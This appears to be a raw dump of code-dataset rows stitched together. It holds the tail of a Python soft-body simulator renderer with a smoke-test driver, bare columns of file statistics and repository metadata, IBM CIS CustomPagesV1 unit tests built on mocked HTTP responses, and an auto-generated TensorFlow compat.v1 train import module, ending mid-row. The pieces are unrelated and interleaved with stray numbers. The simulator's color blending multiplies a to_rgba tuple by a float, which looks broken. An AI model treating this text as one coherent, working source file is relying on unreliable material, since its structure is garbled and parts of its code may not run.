                        x0, y0, x1, y1 = 3, 1, 2, 0
                    elif delta[1] == 1:
                        x0, y0, x1, y1 = 0, 1, 2, 3
                    elif delta[1] == -1:
                        x0, y0, x1, y1 = 1, 0, 3, 2
                    # corner index -> column offset (2 columns per corner)
                    x0 *= 2
                    y0 *= 2
                    x1 *= 2
                    y1 *= 2
                    count[i, :, x0:x0 + 2] += 1
                    count[i, :, x1:x1 + 2] += 1
                    state_acc[i, x0:x0 + 2] += state[j, y0:y0 + 2]
                    state_acc[i, x0 + 8:x0 + 10] += state[j, y0 + 8:y0 + 10]
                    state_acc[i, x1:x1 + 2] += state[j, y1:y1 + 2]
                    state_acc[i, x1 + 8:x1 + 10] += state[j, y1 + 8:y1 + 10]
                elif np.sum(np.abs(delta)) == 2:
                    # contact at a corner: a single corner pair coincides
                    if delta[0] == 1 and delta[1] == 1:
                        x, y = 0, 3
                    elif delta[0] == 1 and delta[1] == -1:
                        x, y = 1, 2
                    elif delta[0] == -1 and delta[1] == 1:
                        x, y = 2, 1
                    elif delta[0] == -1 and delta[1] == -1:
                        x, y = 3, 0
                    x *= 2
                    y *= 2
                    count[i, :, x:x + 2] += 1
                    state_acc[i, x:x + 2] += state[j, y:y + 2]
                    state_acc[i, x + 8:x + 10] += state[j, y + 8:y + 10]
        # average; the (n_box, 2, 8) view broadcasts count over both the
        # position half and the velocity half
        state_acc = state_acc.reshape(self.n_box, 2, 8) / count
        state_acc = state_acc.reshape(self.n_box, 16)
        vel_dim = self.state_dim // 2
        if self.state_prv is None:
            state_acc[:, vel_dim:] = 0
        else:
            state_acc[:, vel_dim:] = (state_acc[:, :vel_dim] - self.state_prv[:, :vel_dim]) / self.dt
        return state_acc

    def step(self):
        """Advance the simulation by one dt: apply forces, cache the
        current observed state, then integrate the space."""
        self.add_force()
        self.state_prv = self.get_state()
        self.space.step(self.dt)

    def render(self, states, actions=None, param=None, act_scale=10.,
               video=True, image=False, path=None, lim=(-6., 6., -7., 5.),
               states_gt=None, count_down=False, gt_border=False):
        """Render a rollout to an .avi video and/or a directory of PNG frames.

        Same contract as SoftEngine.render, minus the corner-marker
        circles: boxes are drawn as filled polygons colored by type and
        action, with an optional semi-transparent ground-truth overlay.
        """
        if video:
            video_path = path + '.avi'
            fourcc = cv2.VideoWriter_fourcc('M', 'J', 'P', 'G')
            print('Save video as %s' % video_path)
            out = cv2.VideoWriter(video_path, fourcc, 25, (640, 480))
        if image:
            image_path = path + '_img'
            print('Save images to %s' % image_path)
            os.system('mkdir -p %s' % image_path)
        time_step = states.shape[0]
        n_ball = states.shape[1] * 4
        states = states[:, :, :8].reshape((time_step, n_ball, 2))
        if states_gt is not None:
            states_gt = states_gt[:, :, :8].reshape((time_step, n_ball, 2))
        init_p = param[3]
        for i in range(time_step):
            fig, ax = plt.subplots(1)
            plt.xlim(lim[0], lim[1])
            plt.ylim(lim[2], lim[3])
            plt.axis('off')
            polys = []
            polys_color = []
            for j in range(self.n_box):
                poly = Polygon(np.array([
                    states[i, j * 4, :2], states[i, j * 4 + 1, :2],
                    states[i, j * 4 + 3, :2], states[i, j * 4 + 2, :2]]), True)
                polys.append(poly)
                if init_p[j, 2] == 0:
                    # actuated box: color reflects the signed action value
                    if actions is not None:
                        act = actions[i, j]
                    else:
                        act = 0.
                    r = (act + act_scale) / (act_scale * 2)
                    if np.abs(r - 0.5) < 1e-4:
                        c = 'cornflowerblue'
                    else:
                        # NOTE(review): assumes to_rgba(...)[:3] supports scalar
                        # multiplication (array-like) — confirm against the
                        # to_rgba helper actually imported by this module
                        c = to_rgba('tomato')[:3] * r + to_rgba('limegreen')[:3] * (1. - r)
                        c = np.clip(c, 0., 1.)
                    polys_color.append(c)
                elif init_p[j, 2] == 1:
                    polys_color.append('lightsteelblue')
                elif init_p[j, 2] == 2:
                    polys_color.append('dimgray')
                elif init_p[j, 2] == 3:
                    polys_color.append('lightsteelblue')
                else:
                    raise AssertionError("Unknown box type %f" % init_p[j, 2])
            if states_gt is not None:
                polys_gt = []
                for j in range(self.n_box):
                    poly = Polygon(np.array([
                        states_gt[i, j * 4, :2], states_gt[i, j * 4 + 1, :2],
                        states_gt[i, j * 4 + 3, :2], states_gt[i, j * 4 + 2, :2]]), True)
                    polys_gt.append(poly)
                if gt_border:
                    pc_polys_gt = PatchCollection(
                        polys_gt, facecolor=(0., 0., 0., 0.), edgecolor='orangered', lw=1.)
                else:
                    pc_polys_gt = PatchCollection(
                        polys_gt, facecolor=polys_color, linewidth=0, alpha=0.5)
            pc_polys = PatchCollection(polys, facecolor=polys_color, linewidth=0, alpha=1.)
            ax.add_collection(pc_polys)
            if states_gt is not None:
                ax.add_collection(pc_polys_gt)
            ax.set_aspect('equal')
            font = {'family': 'serif',
                    'color': 'darkred',
                    'weight': 'normal',
                    'size': 16}
            if count_down:
                plt.text(-7, 4, 'CountDown: %d' % (time_step - i - 1), fontdict=font)
            plt.tight_layout()
            if video:
                fig.canvas.draw()
                # np.fromstring is deprecated for binary input;
                # np.frombuffer is the supported equivalent
                frame = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)
                frame = frame.reshape(fig.canvas.get_width_height()[::-1] + (3,))
                frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
                out.write(frame)
                if i == time_step - 1:
                    # hold the final frame for a short beat
                    for _ in range(10):
                        out.write(frame)
            if image:
                plt.savefig(os.path.join(image_path, 'fig_%s.png' % i), bbox_inches='tight')
            plt.close()
        if video:
            out.release()
if __name__ == '__main__':
    # Smoke-test driver: roll the selected engine forward with random
    # actions and render the resulting trajectory under ./test.
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('--env', default='')
    args = parser.parse_args()
    os.system('mkdir -p test')
    if args.env == 'Rope':
        dt = 1. / 50.
        state_dim = 4
        action_dim = 1
        param_dim = 5 # n_ball, init_x, k, damping, gravity
        act_scale = 2.
        ret_scale = 1.
        engine = RopeEngine(dt, state_dim, action_dim, param_dim)
        time_step = 300
        states = np.zeros((time_step, engine.n_ball, engine.state_dim))
        actions = np.zeros((time_step, engine.action_dim))
        for i in range(time_step):
            states[i] = engine.get_state()
            # random action plus a restoring pull towards x = 0
            act = (np.random.rand() * 2. - 1.) * act_scale - states[i, 0, 0] * ret_scale
            engine.set_action(np.array([act]))
            engine.step()
            actions[i] = engine.get_action()
        engine.render(states, None, engine.get_param(), video=True, image=True, path='test/Rope')
    elif args.env == 'Soft':
        dt = 1. / 50.
        state_dim = 16
        action_dim = 1
        param_dim = 4 # n_box, k, damping, init_p
        act_scale = 800.
        act_delta = 200.
        engine = SoftEngine(dt, state_dim, action_dim, param_dim)
        engine.init()
        time_step = 100
        states = np.zeros((time_step, engine.n_box, state_dim))
        actions = np.zeros((time_step, engine.n_box, action_dim))
        for i in range(time_step):
            states[i] = engine.get_state()
            box_type = engine.init_p[:, 2]
            for j in range(engine.n_box):
                if box_type[j] == 0:
                    # actuated box: random walk on the action, clipped to act_scale
                    if i == 0:
                        actions[i, j] = rand_float(-act_delta, act_delta)
                    else:
                        actions[i, j] = actions[i - 1, j] + rand_float(-act_delta, act_delta)
                    actions[i, j] = np.clip(actions[i, j], -act_scale, act_scale)
                elif box_type[j] >= 1:
                    # if this is a soft box without actuation OR a rigid box
                    actions[i, j] = 0
            engine.set_action(actions[i])
            engine.step()
            assert np.array_equal(actions[i], engine.get_action())
        engine.render(states, None, engine.get_param(), act_scale=act_scale, video=True, image=True, path='test/Soft',
                      count_down=False)
    elif args.env == 'Swim':
        dt = 1. / 50.
        state_dim = 16
        action_dim = 1
        param_dim = 4 # n_box, k, damping, init_p
        act_scale = 600.
        act_delta = 300.
        engine = SwimEngine(dt, state_dim, action_dim, param_dim)
        tag = ['rand', 'forward', 'rotate'][0]
        for epoch in range(5):
            for num in [8]:
                init_p = sample_init_p_flight(num, epoch, True, train=False)
                engine.init(param=[num, None, None, init_p])
                '''
                init_p = get_init_p_fish_8()
                engine.init(param=[8, None, None, init_p])
                '''
                time_step = 100
                states = np.zeros((time_step, engine.n_box, state_dim))
                actions = np.zeros((time_step, engine.n_box, action_dim))
                # per-box [mode roll, sine period scale, sine phase]
                actions_param = np.zeros((engine.n_box, 3))
                sin_motion = np.random.rand() < 0.5
                for i in range(time_step):
                    states[i] = engine.get_state()
                    box_type = engine.init_p[:, 2]
                    for j in range(engine.n_box):
                        if box_type[j] == 0:
                            # if this is an actuated box
                            if i == 0:
                                actions_param[j] = np.array(
                                    [rand_float(0., 1.), rand_float(0.5, 4.), rand_float(0, np.pi * 2)])
                            if actions_param[j, 0] < 0.5 and sin_motion == 0:
                                # bounded random walk on the action
                                if i == 0:
                                    actions[i, j] = rand_float(-act_delta, act_delta)
                                else:
                                    lo = max(actions[i - 1, j] - act_delta, -act_scale)
                                    hi = min(actions[i - 1, j] + act_delta, act_scale)
                                    actions[i, j] = rand_float(lo, hi)
                                actions[i, j] = np.clip(actions[i, j], -act_scale, act_scale)
                            else:
                                # sinusoidal actuation with random amplitude
                                actions[i, j] = np.sin(i / actions_param[j, 1] + actions_param[j, 2]) * \
                                    rand_float(act_scale / 2., act_scale)
                            if tag == 'rotate':
                                # opposite halves only push in opposite signs
                                if j < engine.n_box // 2:
                                    if actions[i, j] < 0: actions[i, j] = 0
                                else:
                                    if actions[i, j] > 0: actions[i, j] = 0
                        elif box_type[j] >= 1:
                            # if this is a soft box without actuation OR a rigid box
                            actions[i, j] = 0
                    engine.set_action(actions[i])
                    engine.step()
                    assert np.array_equal(actions[i], engine.get_action())
                os.system('mkdir -p test/swim_{}_train'.format(tag))
                engine.render(
                    states, None, engine.get_param(), act_scale=act_scale, video=True, image=True,
                    path='test/swim_{}_train/Swim_{}_{}'.format(tag, num, epoch), count_down=False)
| 37.08084
| 118
| 0.452673
| 7,954
| 58,254
| 3.182047
| 0.045386
| 0.03062
| 0.008416
| 0.0226
| 0.832951
| 0.810036
| 0.786764
| 0.758198
| 0.744172
| 0.73228
| 0
| 0.05094
| 0.404882
| 58,254
| 1,570
| 119
| 37.104459
| 0.679128
| 0.034298
| 0
| 0.725846
| 0
| 0
| 0.016891
| 0.000519
| 0
| 0
| 0
| 0
| 0.008258
| 1
| 0.04294
| false
| 0.004955
| 0.009083
| 0.008258
| 0.073493
| 0.006606
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d423d0508653587ed90d8b63f87105fc4668456
| 18,755
|
py
|
Python
|
test/unit/test_custom_pages_v1.py
|
KumarGanesanIBM/networking-python-sdk
|
c00801b8cb908496bb1b8635ee0a53513af57639
|
[
"Apache-2.0"
] | null | null | null |
test/unit/test_custom_pages_v1.py
|
KumarGanesanIBM/networking-python-sdk
|
c00801b8cb908496bb1b8635ee0a53513af57639
|
[
"Apache-2.0"
] | null | null | null |
test/unit/test_custom_pages_v1.py
|
KumarGanesanIBM/networking-python-sdk
|
c00801b8cb908496bb1b8635ee0a53513af57639
|
[
"Apache-2.0"
] | 1
|
2020-07-30T10:39:28.000Z
|
2020-07-30T10:39:28.000Z
|
# -*- coding: utf-8 -*-
# (C) Copyright IBM Corp. 2020.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime, timezone
from ibm_cloud_sdk_core.authenticators.no_auth_authenticator import NoAuthAuthenticator
import inspect
import json
import pytest
import responses
from ibm_cloud_networking_services.custom_pages_v1 import *
# Shared fixtures for every test in this module: a CustomPagesV1 client
# with authentication disabled, pointed at the public CIS endpoint so the
# `responses` library can intercept all outgoing HTTP traffic.
crn = 'testString'
zone_identifier = 'testString'
service = CustomPagesV1(
    authenticator=NoAuthAuthenticator(),
    crn=crn,
    zone_identifier=zone_identifier
)
base_url = 'https://api.cis.cloud.ibm.com'
service.set_service_url(base_url)
##############################################################################
# Start of Service: CustomPages
##############################################################################
# region
#-----------------------------------------------------------------------------
# Test Class for list_instance_custom_pages
#-----------------------------------------------------------------------------
class TestListInstanceCustomPages():
    """Unit tests for CustomPagesV1.list_instance_custom_pages()."""

    _MOCK_RESPONSE = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": [{"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}], "result_info": {"page": 1, "per_page": 20, "total_pages": 1, "count": 10, "total_count": 10}}'

    def _register_get_mock(self):
        # Register the canned JSON reply for the instance-level list endpoint.
        responses.add(responses.GET,
                      base_url + '/v1/testString/custom_pages',
                      body=self._MOCK_RESPONSE,
                      content_type='application/json',
                      status=200)

    @responses.activate
    def test_list_instance_custom_pages_all_params(self):
        self._register_get_mock()
        response = service.list_instance_custom_pages()
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_list_instance_custom_pages_required_params(self):
        # The operation takes no required parameters, so this mirrors the
        # all-params case exactly.
        self._register_get_mock()
        response = service.list_instance_custom_pages()
        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for get_instance_custom_page
#-----------------------------------------------------------------------------
class TestGetInstanceCustomPage():
    """Unit tests for CustomPagesV1.get_instance_custom_page()."""

    _MOCK_RESPONSE = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": {"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}}'

    def _register_get_mock(self):
        # Register the canned JSON reply for the single-page GET endpoint.
        responses.add(responses.GET,
                      base_url + '/v1/testString/custom_pages/basic_challenge',
                      body=self._MOCK_RESPONSE,
                      content_type='application/json',
                      status=200)

    @responses.activate
    def test_get_instance_custom_page_all_params(self):
        self._register_get_mock()
        response = service.get_instance_custom_page(
            'basic_challenge'
        )
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_instance_custom_page_required_params(self):
        # page_identifier is the only (required) parameter, so this mirrors
        # the all-params case exactly.
        self._register_get_mock()
        response = service.get_instance_custom_page(
            'basic_challenge'
        )
        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for update_instance_custom_page
#-----------------------------------------------------------------------------
class TestUpdateInstanceCustomPage():
    """Unit tests for CustomPagesV1.update_instance_custom_page()."""

    _MOCK_RESPONSE = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": {"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}}'

    def _register_put_mock(self):
        # Register the canned JSON reply for the single-page PUT endpoint.
        responses.add(responses.PUT,
                      base_url + '/v1/testString/custom_pages/basic_challenge',
                      body=self._MOCK_RESPONSE,
                      content_type='application/json',
                      status=200)

    @responses.activate
    def test_update_instance_custom_page_all_params(self):
        self._register_put_mock()
        page_identifier = 'basic_challenge'
        url = 'https://www.example.com/basic_challenge_error.html'
        state = 'customized'
        response = service.update_instance_custom_page(
            page_identifier,
            url=url,
            state=state,
        )
        assert len(responses.calls) == 1
        assert response.status_code == 200
        # The request body must echo the optional fields we supplied.
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['url'] == url
        assert req_body['state'] == state

    @responses.activate
    def test_update_instance_custom_page_required_params(self):
        # Only the required page_identifier is sent; no body validation.
        self._register_put_mock()
        response = service.update_instance_custom_page(
            'basic_challenge'
        )
        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for list_zone_custom_pages
#-----------------------------------------------------------------------------
class TestListZoneCustomPages():
    """Unit tests for CustomPagesV1.list_zone_custom_pages()."""

    _MOCK_RESPONSE = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": [{"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}], "result_info": {"page": 1, "per_page": 20, "total_pages": 1, "count": 10, "total_count": 10}}'

    def _register_get_mock(self):
        # Register the canned JSON reply for the zone-level list endpoint.
        responses.add(responses.GET,
                      base_url + '/v1/testString/zones/testString/custom_pages',
                      body=self._MOCK_RESPONSE,
                      content_type='application/json',
                      status=200)

    @responses.activate
    def test_list_zone_custom_pages_all_params(self):
        self._register_get_mock()
        response = service.list_zone_custom_pages()
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_list_zone_custom_pages_required_params(self):
        # The operation takes no required parameters, so this mirrors the
        # all-params case exactly.
        self._register_get_mock()
        response = service.list_zone_custom_pages()
        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for get_zone_custom_page
#-----------------------------------------------------------------------------
class TestGetZoneCustomPage():
    """Exercise get_zone_custom_page against a mocked GET endpoint."""

    # Canned JSON reply shared by every test in this class.
    _CANNED_BODY = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": {"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}}'

    def _register_mock(self):
        """Register the canned GET response for one zone custom page."""
        responses.add(
            responses.GET,
            base_url + '/v1/testString/zones/testString/custom_pages/basic_challenge',
            body=self._CANNED_BODY,
            content_type='application/json',
            status=200)

    #--------------------------------------------------------
    # get_zone_custom_page()
    #--------------------------------------------------------
    @responses.activate
    def test_get_zone_custom_page_all_params(self):
        """Fetch a single custom page by identifier and verify success."""
        self._register_mock()
        page_identifier = 'basic_challenge'
        response = service.get_zone_custom_page(page_identifier)
        assert len(responses.calls) == 1
        assert response.status_code == 200

    #--------------------------------------------------------
    # test_get_zone_custom_page_required_params()
    #--------------------------------------------------------
    @responses.activate
    def test_get_zone_custom_page_required_params(self):
        """Same call using only the required positional parameter."""
        self._register_mock()
        page_identifier = 'basic_challenge'
        response = service.get_zone_custom_page(page_identifier)
        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for update_zone_custom_page
#-----------------------------------------------------------------------------
class TestUpdateZoneCustomPage():
    """Exercise update_zone_custom_page against a mocked PUT endpoint."""

    # Canned JSON reply shared by every test in this class.
    _CANNED_BODY = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": {"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}}'

    def _register_mock(self):
        """Register the canned PUT response for one zone custom page."""
        responses.add(
            responses.PUT,
            base_url + '/v1/testString/zones/testString/custom_pages/basic_challenge',
            body=self._CANNED_BODY,
            content_type='application/json',
            status=200)

    #--------------------------------------------------------
    # update_zone_custom_page()
    #--------------------------------------------------------
    @responses.activate
    def test_update_zone_custom_page_all_params(self):
        """Update with all optional keyword arguments and validate the body sent."""
        self._register_mock()

        # Parameter values; `page_url` avoids shadowing the endpoint URL.
        page_identifier = 'basic_challenge'
        page_url = 'https://www.example.com/basic_challenge_error.html'
        state = 'customized'

        response = service.update_zone_custom_page(
            page_identifier,
            url=page_url,
            state=state,
        )

        # One HTTP call, successful.
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # The request body must echo the keyword arguments we supplied.
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['url'] == page_url
        assert req_body['state'] == state

    #--------------------------------------------------------
    # test_update_zone_custom_page_required_params()
    #--------------------------------------------------------
    @responses.activate
    def test_update_zone_custom_page_required_params(self):
        """Update passing only the required positional parameter."""
        self._register_mock()
        page_identifier = 'basic_challenge'
        response = service.update_zone_custom_page(page_identifier)
        assert len(responses.calls) == 1
        assert response.status_code == 200
# endregion
##############################################################################
# End of Service: CustomPages
##############################################################################
| 46.8875
| 506
| 0.539803
| 1,818
| 18,755
| 5.336084
| 0.10231
| 0.07793
| 0.019792
| 0.032162
| 0.8729
| 0.8729
| 0.8729
| 0.862798
| 0.8428
| 0.807752
| 0
| 0.032161
| 0.205865
| 18,755
| 399
| 507
| 47.005013
| 0.619176
| 0.23903
| 0
| 0.794118
| 0
| 0.058824
| 0.437355
| 0.100723
| 0
| 0
| 0
| 0
| 0.137255
| 1
| 0.058824
| false
| 0
| 0.034314
| 0
| 0.122549
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d67917db20d3abe76dc371e2111f0d0842ca2a7
| 8,606
|
py
|
Python
|
venv/Lib/site-packages/tensorflow_core/_api/v2/compat/v1/train/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/tensorflow_core/_api/v2/compat/v1/train/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/tensorflow_core/_api/v2/compat/v1/train/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Support for training models.
See the [Training](https://tensorflow.org/api_guides/python/train) guide.
"""
from __future__ import print_function as _print_function
import sys as _sys
from . import experimental
from . import queue_runner
from tensorflow.python import ServerDef
from tensorflow.python.framework.graph_io import write_graph
from tensorflow.python.ops.gen_sdca_ops import sdca_fprint
from tensorflow.python.ops.gen_sdca_ops import sdca_optimizer
from tensorflow.python.ops.gen_sdca_ops import sdca_shrink_l1
from tensorflow.python.pywrap_tensorflow_internal import NewCheckpointReader
from tensorflow.python.pywrap_tensorflow_internal import do_quantize_training_on_graphdef
from tensorflow.python.summary.summary_iterator import summary_iterator
from tensorflow.python.training.adadelta import AdadeltaOptimizer
from tensorflow.python.training.adagrad import AdagradOptimizer
from tensorflow.python.training.adagrad_da import AdagradDAOptimizer
from tensorflow.python.training.adam import AdamOptimizer
from tensorflow.python.training.basic_loops import basic_train_loop
from tensorflow.python.training.basic_session_run_hooks import CheckpointSaverHook
from tensorflow.python.training.basic_session_run_hooks import CheckpointSaverListener
from tensorflow.python.training.basic_session_run_hooks import FeedFnHook
from tensorflow.python.training.basic_session_run_hooks import FinalOpsHook
from tensorflow.python.training.basic_session_run_hooks import GlobalStepWaiterHook
from tensorflow.python.training.basic_session_run_hooks import LoggingTensorHook
from tensorflow.python.training.basic_session_run_hooks import NanLossDuringTrainingError
from tensorflow.python.training.basic_session_run_hooks import NanTensorHook
from tensorflow.python.training.basic_session_run_hooks import ProfilerHook
from tensorflow.python.training.basic_session_run_hooks import SecondOrStepTimer
from tensorflow.python.training.basic_session_run_hooks import StepCounterHook
from tensorflow.python.training.basic_session_run_hooks import StopAtStepHook
from tensorflow.python.training.basic_session_run_hooks import SummarySaverHook
from tensorflow.python.training.checkpoint_management import CheckpointManager
from tensorflow.python.training.checkpoint_management import checkpoint_exists
from tensorflow.python.training.checkpoint_management import generate_checkpoint_state_proto
from tensorflow.python.training.checkpoint_management import get_checkpoint_mtimes
from tensorflow.python.training.checkpoint_management import get_checkpoint_state
from tensorflow.python.training.checkpoint_management import latest_checkpoint
from tensorflow.python.training.checkpoint_management import remove_checkpoint
from tensorflow.python.training.checkpoint_management import update_checkpoint_state
from tensorflow.python.training.checkpoint_utils import checkpoints_iterator
from tensorflow.python.training.checkpoint_utils import init_from_checkpoint
from tensorflow.python.training.checkpoint_utils import list_variables
from tensorflow.python.training.checkpoint_utils import load_checkpoint
from tensorflow.python.training.checkpoint_utils import load_variable
from tensorflow.python.training.coordinator import Coordinator
from tensorflow.python.training.coordinator import LooperThread
from tensorflow.python.training.device_setter import replica_device_setter
from tensorflow.python.training.ftrl import FtrlOptimizer
from tensorflow.python.training.gradient_descent import GradientDescentOptimizer
from tensorflow.python.training.input import batch
from tensorflow.python.training.input import batch_join
from tensorflow.python.training.input import input_producer
from tensorflow.python.training.input import limit_epochs
from tensorflow.python.training.input import match_filenames_once
from tensorflow.python.training.input import maybe_batch
from tensorflow.python.training.input import maybe_batch_join
from tensorflow.python.training.input import maybe_shuffle_batch
from tensorflow.python.training.input import maybe_shuffle_batch_join
from tensorflow.python.training.input import range_input_producer
from tensorflow.python.training.input import shuffle_batch
from tensorflow.python.training.input import shuffle_batch_join
from tensorflow.python.training.input import slice_input_producer
from tensorflow.python.training.input import string_input_producer
from tensorflow.python.training.learning_rate_decay import cosine_decay
from tensorflow.python.training.learning_rate_decay import cosine_decay_restarts
from tensorflow.python.training.learning_rate_decay import exponential_decay
from tensorflow.python.training.learning_rate_decay import inverse_time_decay
from tensorflow.python.training.learning_rate_decay import linear_cosine_decay
from tensorflow.python.training.learning_rate_decay import natural_exp_decay
from tensorflow.python.training.learning_rate_decay import noisy_linear_cosine_decay
from tensorflow.python.training.learning_rate_decay import piecewise_constant
from tensorflow.python.training.learning_rate_decay import piecewise_constant as piecewise_constant_decay
from tensorflow.python.training.learning_rate_decay import polynomial_decay
from tensorflow.python.training.momentum import MomentumOptimizer
from tensorflow.python.training.monitored_session import ChiefSessionCreator
from tensorflow.python.training.monitored_session import MonitoredSession
from tensorflow.python.training.monitored_session import MonitoredTrainingSession
from tensorflow.python.training.monitored_session import Scaffold
from tensorflow.python.training.monitored_session import SessionCreator
from tensorflow.python.training.monitored_session import SingularMonitoredSession
from tensorflow.python.training.monitored_session import WorkerSessionCreator
from tensorflow.python.training.moving_averages import ExponentialMovingAverage
from tensorflow.python.training.optimizer import Optimizer
from tensorflow.python.training.proximal_adagrad import ProximalAdagradOptimizer
from tensorflow.python.training.proximal_gradient_descent import ProximalGradientDescentOptimizer
from tensorflow.python.training.queue_runner_impl import QueueRunner
from tensorflow.python.training.queue_runner_impl import add_queue_runner
from tensorflow.python.training.queue_runner_impl import start_queue_runners
from tensorflow.python.training.rmsprop import RMSPropOptimizer
from tensorflow.python.training.saver import Saver
from tensorflow.python.training.saver import export_meta_graph
from tensorflow.python.training.saver import import_meta_graph
from tensorflow.python.training.server_lib import ClusterSpec
from tensorflow.python.training.server_lib import Server
from tensorflow.python.training.session_manager import SessionManager
from tensorflow.python.training.session_run_hook import SessionRunArgs
from tensorflow.python.training.session_run_hook import SessionRunContext
from tensorflow.python.training.session_run_hook import SessionRunHook
from tensorflow.python.training.session_run_hook import SessionRunValues
from tensorflow.python.training.supervisor import Supervisor
from tensorflow.python.training.sync_replicas_optimizer import SyncReplicasOptimizer
from tensorflow.python.training.tracking.util import CheckpointV1 as Checkpoint
from tensorflow.python.training.training import BytesList
from tensorflow.python.training.training import ClusterDef
from tensorflow.python.training.training import Example
from tensorflow.python.training.training import Feature
from tensorflow.python.training.training import FeatureList
from tensorflow.python.training.training import FeatureLists
from tensorflow.python.training.training import Features
from tensorflow.python.training.training import FloatList
from tensorflow.python.training.training import Int64List
from tensorflow.python.training.training import JobDef
from tensorflow.python.training.training import SaverDef
from tensorflow.python.training.training import SequenceExample
from tensorflow.python.training.training_util import assert_global_step
from tensorflow.python.training.training_util import create_global_step
from tensorflow.python.training.training_util import get_global_step
from tensorflow.python.training.training_util import get_or_create_global_step
from tensorflow.python.training.training_util import global_step
from tensorflow.python.training.warm_starting_util import VocabInfo
from tensorflow.python.training.warm_starting_util import warm_start
del _print_function
| 64.706767
| 105
| 0.896003
| 1,089
| 8,606
| 6.86685
| 0.189164
| 0.250334
| 0.310243
| 0.404386
| 0.704065
| 0.658732
| 0.552955
| 0.419363
| 0.265579
| 0.071008
| 0
| 0.000495
| 0.060074
| 8,606
| 132
| 106
| 65.19697
| 0.923971
| 0.026726
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008264
| 1
| 0
| true
| 0
| 0.991736
| 0
| 0.991736
| 0.024793
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
53ba915cacc281d87ab55f1e308d5a6221c7a741
| 71
|
py
|
Python
|
